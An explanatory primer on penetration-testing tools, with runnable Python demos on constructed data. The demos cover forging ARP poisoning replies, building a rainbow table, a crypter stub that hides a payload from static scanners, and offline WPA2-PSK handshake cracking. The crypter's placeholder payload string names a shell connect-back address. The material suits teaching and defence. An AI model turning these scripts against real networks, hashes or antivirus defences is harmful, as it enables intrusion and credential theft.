Malicious Software Tools - A Primer

There is no shortage of tools, applications and software kits that aid in the process of penetration testing. These applications can and will be used by malicious attackers, and should therefore also be used by ethical hackers to understand their implications and "fight fire with fire", so to speak. This is a primer on these tools; its purpose is not to list every possible tool exhaustively, but rather to serve as an introduction to what each of them does and what goals it serves in the context of hacking.

Some of the most popular and versatile software tools used to penetrate and exploit systems, grouped by their main function, include (but are not limited to) the following.

Footprinting and Reconnaissance

  • Netcraft and Whois Lookups: Netcraft records uptime, hosting history and a host of metadata about domains and websites (web server and OS in use, hosting provider, netblock owner). Whois lookups return a domain's registrar, name servers, registration dates and, unless hidden behind a privacy service, the registrant's contact details, which aids social engineering attacks and domain spoofing (registering look-alike domains) as well.
  • DNS Reconnaissance: Using nslookup, dig and other DNS tools allows the attacker to enumerate a domain's records (A, AAAA, MX, NS, TXT, SRV) and to check whether the name servers allow zone transfers (AXFR), which would hand over the entire zone in a single query.

Port and Vulnerability Scanning

  • Nmap: A Swiss army knife used for everything from host discovery and port scanning to identifying the service and version listening on each open port, OS fingerprinting and scripted checks (NSE). It is the industry standard for this purpose.
  • Nessus: Tenable's Nessus is a very popular vulnerability scanner. It has commercial and free (limited) versions, and there are entire courses dedicated to this tool.
  • Metasploit: Metasploit is a penetration testing framework that ships with a large library of exploit modules for known vulnerabilities, along with auxiliary scanners and payloads. It lets a tester work through an attack in a structured way: scan for open ports, detect vulnerable services, then launch the matching exploit module against them. It is built into Kali Linux.
  • Nikto: This is a web server scanner built into Kali Linux; it is like Nessus but dedicated to web servers and the applications they host. It looks for dangerous files and CGIs, outdated server software and configurations that go against security best practices.

Packet Capture and Sniffing

  • Wireshark: Another extremely useful multi-purpose tool is Wireshark, a graphical network protocol analyzer that dissects individual packets and can capture Ethernet, Bluetooth, Wi-Fi and other kinds of traffic. It can also reassemble TCP streams and extract the files carried in them (provided they are unencrypted, of course); replaying a capture onto the wire is done with companion tools such as tcpreplay.
  • Snort: Snort is a well-known IDS/IPS. It starts out as a packet capture and logging engine and adds rule-based inspection of the protocol fields and raw payload of each packet. Using its large ruleset, it is an essential tool for detecting scans, exploit attempts and malware traffic on the network, and in inline (IPS) mode it can drop them.
  • Poisoning and Stripping attacks: ARP poisoning sends forged ARP replies so that the victim maps the gateway's IP address to the attacker's MAC address (and the gateway maps the victim's IP the same way); the attacker then sits in the middle, forwarding and capturing their traffic. DNS cache poisoning inserts bogus entries into a resolver's cache, so that traffic intended for one site is routed to a server the attacker controls. SSL attacks use tools such as Ettercap or sslstrip: the man in the middle either presents its own forged certificate to the victim (which the browser flags unless the victim clicks through) or strips HTTPS down to plain HTTP, so the sensitive information the victim enters into the form ends up with the attacker.
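The ARP poisoning described above, as an added example that is not code from the original article: it builds the forged ARP reply a poisoner sends and runs a passive monitor of the kind arpwatch implements, which flags an IP address whose MAC binding suddenly changes. All addresses and frames are constructed here and nothing is sent on the wire.

```python
"""Added example, not from the original article: a forged ARP reply and a
monitor that spots poisoning. Addresses are constructed for the demo."""
import struct

ETH_P_ARP = 0x0806
ARP_REQUEST, ARP_REPLY = 1, 2


def mac_bytes(mac: str) -> bytes:
    return bytes(int(octet, 16) for octet in mac.split(":"))


def ip_bytes(ip: str) -> bytes:
    return bytes(int(octet) for octet in ip.split("."))


def build_arp_reply(sender_mac: str, sender_ip: str, target_mac: str, target_ip: str) -> bytes:
    """Ethernet II + ARP frame asserting 'sender_ip is at sender_mac'.
    A poisoner sets sender_ip to the gateway's IP and sender_mac to its own NIC,
    sends it to the victim, and sends the mirror image to the gateway."""
    eth = mac_bytes(target_mac) + mac_bytes(sender_mac) + struct.pack("!H", ETH_P_ARP)
    # htype=Ethernet(1), ptype=IPv4(0x0800), hlen=6, plen=4, opcode
    arp = struct.pack("!HHBBH", 1, 0x0800, 6, 4, ARP_REPLY)
    arp += mac_bytes(sender_mac) + ip_bytes(sender_ip)
    arp += mac_bytes(target_mac) + ip_bytes(target_ip)
    return eth + arp


def parse_arp(frame: bytes):
    """Return (opcode, sender_mac, sender_ip) for an Ethernet/ARP frame, else None."""
    if len(frame) < 42 or struct.unpack("!H", frame[12:14])[0] != ETH_P_ARP:
        return None
    opcode = struct.unpack("!H", frame[20:22])[0]
    sender_mac = ":".join(f"{b:02x}" for b in frame[22:28])
    sender_ip = ".".join(str(b) for b in frame[28:32])
    return opcode, sender_mac, sender_ip


class ArpMonitor:
    """Keeps the IP -> MAC bindings seen in ARP replies; an IP that suddenly
    claims a different MAC is the classic sign of poisoning."""

    def __init__(self):
        self.bindings = {}
        self.alerts = []

    def observe(self, frame: bytes):
        parsed = parse_arp(frame)
        if parsed is None or parsed[0] != ARP_REPLY:
            return
        _, mac, ip = parsed
        previous = self.bindings.get(ip)
        if previous is not None and previous != mac:
            self.alerts.append((ip, previous, mac))
        self.bindings[ip] = mac


# Constructed demo traffic: the real gateway answers first, then the attacker
# sends a reply claiming the gateway's IP for its own MAC.
GATEWAY_IP, GATEWAY_MAC = "192.168.1.1", "00:11:22:33:44:55"
VICTIM_IP, VICTIM_MAC = "192.168.1.50", "66:77:88:99:aa:bb"
ATTACKER_MAC = "aa:aa:aa:aa:aa:aa"

DEMO_FRAMES = [
    build_arp_reply(GATEWAY_MAC, GATEWAY_IP, VICTIM_MAC, VICTIM_IP),
    build_arp_reply(ATTACKER_MAC, GATEWAY_IP, VICTIM_MAC, VICTIM_IP),  # the poison
]


def run_demo():
    monitor = ArpMonitor()
    for frame in DEMO_FRAMES:
        monitor.observe(frame)
    return monitor.alerts


if __name__ == "__main__":
    for ip, old, new in run_demo():
        print(f"ALERT: {ip} moved from {old} to {new}")
```

Run it and the monitor reports the gateway IP moving from the real MAC to the attacker's. The same check on a real interface (static ARP entries for the gateway, or Dynamic ARP Inspection on the switch) is the standard defence.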

Password Attacks and Injecting Code

  • Buffer Overflows: A buffer overflow happens when a program writes more data into a fixed-size buffer than it can hold. The excess overwrites adjacent memory, such as a saved return address, which lets an attacker redirect execution to code (shellcode) supplied in the same input and run it on the target system.
  • Hydra: Hydra is an online password attack tool: it tries username and password combinations directly against running network services (SSH, FTP, HTTP forms, RDP and many more). Because it talks to the live service it is noisy, and it is slowed by rate limiting and account lockouts.
  • John the Ripper: One of the most popular tools for breaking passwords, John the Ripper works offline on captured hashes. Its main modes are single-crack (guesses derived from the account's own data), wordlist with mangling rules, and incremental, which is brute force. Brute force is very practical against LM hashes because LM uppercases the password and hashes it as two independent 7-character halves, so the set of possible plaintexts is very limited.
  • Rainbow Tables: A rainbow table is a precomputed structure for reversing unsalted hashes, a time-memory trade-off. It does not hold every possible hash for an algorithm; it stores only the start and end points of long chains of alternating hash and reduction steps over a chosen keyspace (say, all alphanumeric passwords up to a given length) and regenerates the relevant chain at lookup time. Salting defeats rainbow tables because the table would have to be rebuilt for every salt.
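The rainbow table mechanics from the item above, as an added example (not the article's code and not taken from any cracking tool): a miniature table over three-letter lowercase passwords and unsalted MD5. It shows the hash/reduce chains, that only chain endpoints are stored, the quadratic lookup cost that buys the memory saving, and that the same password with a salt is not found. Keyspace, chain length and chain count are demo values, far too small for real use.

```python
"""Added example, not the article's or any tool's code: a tiny rainbow table."""
import hashlib
import string

ALPHABET = string.ascii_lowercase
PW_LEN = 3
KEYSPACE = len(ALPHABET) ** PW_LEN   # 17,576 passwords
CHAIN_LEN = 50


def h(pw: str, salt: str = "") -> str:
    return hashlib.md5((salt + pw).encode()).hexdigest()


def reduce_(digest: str, step: int) -> str:
    """Map a digest back into the password space. Mixing in the column number
    ('step') is what makes this a *rainbow* table: chains colliding in different
    columns do not merge, unlike in Hellman's original tables."""
    n = (int(digest[:12], 16) + step) % KEYSPACE
    chars = []
    for _ in range(PW_LEN):
        chars.append(ALPHABET[n % len(ALPHABET)])
        n //= len(ALPHABET)
    return "".join(chars)


def chain_start(i: int) -> str:
    return reduce_(h(f"seed{i}"), 0)


def chain_password(i: int, column: int) -> str:
    """The password at 'column' of chain i (column 0 is the start point)."""
    pw = chain_start(i)
    for step in range(column):
        pw = reduce_(h(pw), step)
    return pw


def build_table(n_chains: int) -> dict:
    """Only end -> [start points] is stored; the CHAIN_LEN passwords in between
    are recomputed on demand. Memory is n_chains entries, not the whole keyspace."""
    table = {}
    for i in range(n_chains):
        table.setdefault(chain_password(i, CHAIN_LEN), []).append(chain_start(i))
    return table


def lookup(table: dict, target: str):
    """Assume the target sits in column 'pos', walk forward to the chain end, and
    if that end is in the table regenerate the chain to recover the pre-image.
    Work is O(CHAIN_LEN**2) hashes, the price of storing only endpoints."""
    for pos in range(CHAIN_LEN - 1, -1, -1):
        cand = reduce_(target, pos)
        for step in range(pos + 1, CHAIN_LEN):
            cand = reduce_(h(cand), step)
        for start in table.get(cand, []):     # may be a false alarm from a merged chain
            pw = start
            for step in range(CHAIN_LEN):
                if h(pw) == target:
                    return pw
                pw = reduce_(h(pw), step)
    return None


def demo():
    table = build_table(400)             # 400 chains * 50 columns = 20,000 positions
    victim = chain_password(7, 23)       # a password the table is known to cover
    found = lookup(table, h(victim))
    # Same password, salted: the digest is of "s4lt" + pw, which no chain ever hashed.
    salted = lookup(table, h(victim, salt="s4lt"))
    return victim, found, salted


if __name__ == "__main__":
    victim, found, salted = demo()
    print(f"unsalted md5 of {victim!r} -> {found!r}; salted -> {salted!r}")
```

Real tables use much longer chains and millions of them, and store endpoints on disk sorted for binary search; the lookup loop above is the same algorithm. Because the salted lookup fails for every chain, a per-user random salt forces the attacker back to brute force or a dictionary attack on each hash individually.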

Non-technical Attacks

  • Social engineering: This is the art of tricking actual humans into doing your bidding, insidiously and without raising suspicion. The most common vector for social engineering is, of course, email. This leads us to our next item.
  • Phishing and Spear-Phishing: Phishing attacks trick users into divulging sensitive information by posing as a genuine, authorized communication. Spear-phishing targets specific individuals, often high-profile ones, with tailored messages rather than casting the net wide and hoping someone takes the bait.
  • Spam: Spam is primarily unsolicited bulk advertising that clogs mailboxes and networks, and that volume is exactly why attackers ride on it: malicious attachments and links get lost in the large amount of marketing and advertising email.

Evasion and Bypassing Security Systems

  • Msfvenom: This Metasploit tool generates payloads in many formats and can inject a payload into a legitimate executable used as a template, optionally keeping the original program's behaviour so the user notices nothing. Note that altering the binary invalidates any digital signature it carried, so this does not bypass signature-based allow-listing; the evasion value comes from the payload hiding inside a familiar program and from msfvenom's encoders, which by themselves no longer fool modern Anti-virus engines.
  • Hyperion: One way to disguise a malicious payload is to encrypt it. Hyperion is a PE crypter that encrypts the executable with AES using a key drawn from a deliberately small keyspace and wraps it in a decryption stub. The stub does not contain the key; at run time it brute-forces the key, decrypts the original, malicious executable in memory and runs it. A scanner looking at the file on disk sees only the stub and ciphertext.
  • Veil-Evasion: Another tool used by attackers to evade traditional AV systems. It generates payload droppers in Python, C, PowerShell and other languages, with encryption and obfuscation to avoid known signatures, and compiles them into executables.
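The crypter pattern behind Hyperion, as an added example that is not Hyperion's or Veil's code: the packer encrypts the payload under a key with only a couple of unknown bytes and throws the key away; the stub recovers it by brute force at run time and checks each guess against a hash of the plaintext. Hyperion uses AES; to keep this runnable with the standard library alone, the cipher here is a stand-in keystream derived from SHA-256 (an assumption of this demo, not Hyperion's internals), and the payload is a constructed placeholder string, not shellcode.

```python
"""Added example, not Hyperion's or Veil's code: a crypter with a tiny key space.
Stand-in SHA-256 keystream instead of AES; placeholder payload."""
import hashlib
import itertools
import os

KEY_LEN = 16          # the stub knows the key is 16 bytes...
BRUTE_BYTES = 2       # ...and that only the first 2 are non-zero: 65,536 candidates


def keystream(key: bytes, n: int) -> bytes:
    """Counter-mode keystream from SHA-256 (stand-in for AES)."""
    out = bytearray()
    counter = 0
    while len(out) < n:
        out += hashlib.sha256(key + counter.to_bytes(4, "big")).digest()
        counter += 1
    return bytes(out[:n])


def xor(a: bytes, b: bytes) -> bytes:
    n = min(len(a), len(b))
    return (int.from_bytes(a[:n], "big") ^ int.from_bytes(b[:n], "big")).to_bytes(n, "big")


def pack_payload(payload: bytes) -> tuple:
    """Crypter side: random key in BRUTE_BYTES bytes and zero elsewhere, payload
    encrypted, and a short hash of the plaintext kept so the stub can recognise
    the right key. The key itself is not stored anywhere."""
    key = os.urandom(BRUTE_BYTES) + bytes(KEY_LEN - BRUTE_BYTES)
    blob = xor(payload, keystream(key, len(payload)))
    tag = hashlib.sha256(payload).digest()[:8]
    return blob, tag


def stub_unpack(blob: bytes, tag: bytes) -> tuple:
    """Stub side, at run time: try every key in the small space until the
    decrypted bytes match the tag. Returns (payload, keys_tried)."""
    for tried, guess in enumerate(itertools.product(range(256), repeat=BRUTE_BYTES), start=1):
        key = bytes(guess) + bytes(KEY_LEN - BRUTE_BYTES)
        plain = xor(blob, keystream(key, len(blob)))
        if hashlib.sha256(plain).digest()[:8] == tag:
            return plain, tried
    raise ValueError("no key in the search space matched the tag")


def static_scan(data: bytes, signature: bytes) -> bool:
    """A byte-pattern 'AV signature' check, the kind of detection the crypter evades."""
    return signature in data


# Constructed placeholder payload; a real crypter wraps a PE file or shellcode.
PAYLOAD = b"EVIL_PAYLOAD: exec /bin/sh; connect back 10.0.0.5:4444"
SIGNATURE = b"EVIL_PAYLOAD"


def demo() -> dict:
    blob, tag = pack_payload(PAYLOAD)
    plain, tried = stub_unpack(blob, tag)
    return {
        "on_disk_detected": static_scan(blob, SIGNATURE),     # what a file scanner sees
        "in_memory_detected": static_scan(plain, SIGNATURE),  # what a memory scanner sees
        "recovered": plain == PAYLOAD,
        "keys_tried": tried,
    }


if __name__ == "__main__":
    print(demo())
```

The point of the brute-force step is that the on-disk file carries neither the plaintext nor the key, so a purely static signature has nothing to match; the plaintext reappears in memory the moment the stub finishes, which is why memory scanning and sandbox execution still catch this class of packer.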

Wireless Attacks

  • Aircrack-ng: A suite (airmon-ng, airodump-ng, aireplay-ng, aircrack-ng) for auditing Wi-Fi. WEP has multiple inherent weaknesses in how it uses RC4 that allow attackers to recover keys or alter legitimate packets; aircrack-ng recovers a WEP key statistically once enough encrypted packets (unique IVs) have been captured, and aireplay-ng can inject packets (an ARP replay, for instance) to generate that traffic faster. It can also crack WPA/WPA2-PSK keys, but by a different route: capture the four-way handshake between a client and the access point (deauthenticating the client with aireplay-ng forces a fresh one), then run an offline dictionary attack in which each candidate passphrase is run through PBKDF2 with the SSID to derive the pre-shared key and checked against the handshake's MIC. A long random passphrase defeats this, since there is no shortcut around the guessing.
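The offline stage of the WPA2-PSK attack described above, as an added example that is not part of aircrack-ng: for each dictionary word it derives the PMK with PBKDF2, expands it to the PTK with the 802.11i PRF-512, and checks whether the first 16 bytes (the KCK) reproduce the MIC of the captured EAPOL message. The SSID, MAC addresses, nonces, EAPOL frame and passphrase are all constructed here so that the script runs without a capture file; the derivation chain itself is the standard one for WPA2/CCMP.

```python
"""Added example, not aircrack-ng code: WPA2-PSK handshake cracking, offline stage.
Capture values below are constructed for the demo."""
import hashlib
import hmac


def derive_pmk(passphrase: str, ssid: str) -> bytes:
    """PMK = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 iterations, 32 bytes).
    The 4096 iterations are what makes each guess expensive (and why GPUs help)."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def derive_ptk(pmk: bytes, ap_mac: bytes, client_mac: bytes, anonce: bytes, snonce: bytes) -> bytes:
    """PRF-512 from 802.11i: HMAC-SHA1(PMK, label || 0x00 || min(MACs) || max(MACs)
    || min(nonces) || max(nonces) || i) for i = 0..3, concatenated and cut to 64 bytes."""
    data = (b"Pairwise key expansion\x00"
            + min(ap_mac, client_mac) + max(ap_mac, client_mac)
            + min(anonce, snonce) + max(anonce, snonce))
    blocks = [hmac.new(pmk, data + bytes([i]), hashlib.sha1).digest() for i in range(4)]
    return b"".join(blocks)[:64]


def eapol_mic(kck: bytes, eapol_frame_mic_zeroed: bytes) -> bytes:
    """WPA2 (CCMP): MIC = HMAC-SHA1(KCK, EAPOL-Key frame with the MIC field zeroed)[:16].
    KCK is the first 16 bytes of the PTK."""
    return hmac.new(kck, eapol_frame_mic_zeroed, hashlib.sha1).digest()[:16]


def crack(handshake: dict, wordlist):
    """Return the word that reproduces the captured MIC, or None if it is not in the list."""
    for word in wordlist:
        pmk = derive_pmk(word, handshake["ssid"])
        kck = derive_ptk(pmk, handshake["ap_mac"], handshake["client_mac"],
                         handshake["anonce"], handshake["snonce"])[:16]
        if hmac.compare_digest(eapol_mic(kck, handshake["eapol"]), handshake["mic"]):
            return word
    return None


# --- Constructed "capture" (demo values, not from a real network) ------------------
SSID = "demo-net"
AP_MAC = bytes.fromhex("001122334455")
CLIENT_MAC = bytes.fromhex("66778899aabb")
ANONCE = bytes(range(32))          # would come from handshake message 1
SNONCE = bytes(range(32, 64))      # would come from handshake message 2
# Message 2's EAPOL-Key frame with its 16-byte MIC field zeroed; the field layout
# here is only illustrative, any byte string in the MIC-zeroed form would do.
EAPOL_M2 = b"\x01\x03\x00\x75\x02\x01\x0a\x00" + bytes(16) + SNONCE + bytes(16) + bytes(16)


def make_handshake(passphrase: str) -> dict:
    """Build the capture an attacker would get from airodump-ng, by computing the
    MIC the client would have sent for this passphrase."""
    kck = derive_ptk(derive_pmk(passphrase, SSID), AP_MAC, CLIENT_MAC, ANONCE, SNONCE)[:16]
    return {"ssid": SSID, "ap_mac": AP_MAC, "client_mac": CLIENT_MAC,
            "anonce": ANONCE, "snonce": SNONCE, "eapol": EAPOL_M2,
            "mic": eapol_mic(kck, EAPOL_M2)}


WORDLIST = ["password", "12345678", "letmein2024", "hunter22"]

if __name__ == "__main__":
    print(crack(make_handshake("letmein2024"), WORDLIST))
    print(crack(make_handshake("not-in-the-list"), WORDLIST))
```

Only the first two messages of the handshake are strictly needed (ANonce from message 1, SNonce and the MIC from message 2), which is why a deauth that triggers a reconnect is enough. Nothing in the check depends on traffic after the handshake, so the attack is entirely offline once the capture exists, and the only defences are passphrase strength or moving to WPA3-SAE.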
